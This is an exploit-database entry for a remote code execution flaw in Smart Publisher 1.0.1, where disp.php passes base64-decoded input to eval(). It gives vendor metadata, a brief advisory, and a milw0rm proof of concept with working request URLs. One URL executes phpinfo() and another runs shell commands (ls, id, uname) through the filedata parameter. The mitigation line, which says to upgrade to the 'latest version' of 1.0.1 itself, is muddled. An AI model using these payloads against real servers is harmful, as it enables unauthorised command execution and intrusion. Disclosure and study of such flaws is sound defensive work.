Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit

vendor:

Smart Publisher

by:

milw0rm.com

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Smart Publisher

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:smartpublisher:smart_publisher:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit

Smart Publisher 1.0.1 is vulnerable to Remote Code Execution due to an insecure usage of the 'eval()' function in '/admin/op/disp.php' in line 3. An attacker can exploit this vulnerability by sending a maliciously crafted 'filedata' parameter in the URL. For example, sending 'cGhwaW5mbygp' as the 'filedata' parameter will execute the 'phpinfo()' function.

Mitigation:

Upgrade to the latest version of Smart Publisher 1.0.1 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

              ######    ######                 ##############               ######  ######                      ########          ##    
                ####      ##                   ##    ##    ##                 ##      ##                      ##      ##                
  ########      ##  ##    ##      ########           ##       ####  ######      ##  ##        ########      ##                ######    
##        ##    ##  ##    ##    ##        ##         ##         ####            ##  ##      ##        ##    ##                    ##    
  ##########    ##    ##  ##      ##########         ##         ##                ##          ##########    ##      ######        ##    
##        ##    ##    ##  ##    ##        ##         ##         ##                ##        ##        ##    ##        ##          ##    
##        ##    ##      ####    ##        ##  ###    ##         ##                ##        ##        ##      ##      ##          ##    
  #########   ######    ####      #########   ###  ######     ##########        ######        ##########        ######        ##########

                            ######################################################################
                            ### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
                            ### Script : http://sourceforge.net/projects/smart-publisher/      ###
                            ### Vuln Code In '/admin/op/disp.php'In Line '3'                   ###
                            ### eval("\$v=".base64_decode($filedata).";"); <- Vuln             ###
                            ### POC :                                                          ###
                            ### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64   ###
                            ### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
                            ######################################################################

# milw0rm.com [2008-01-29]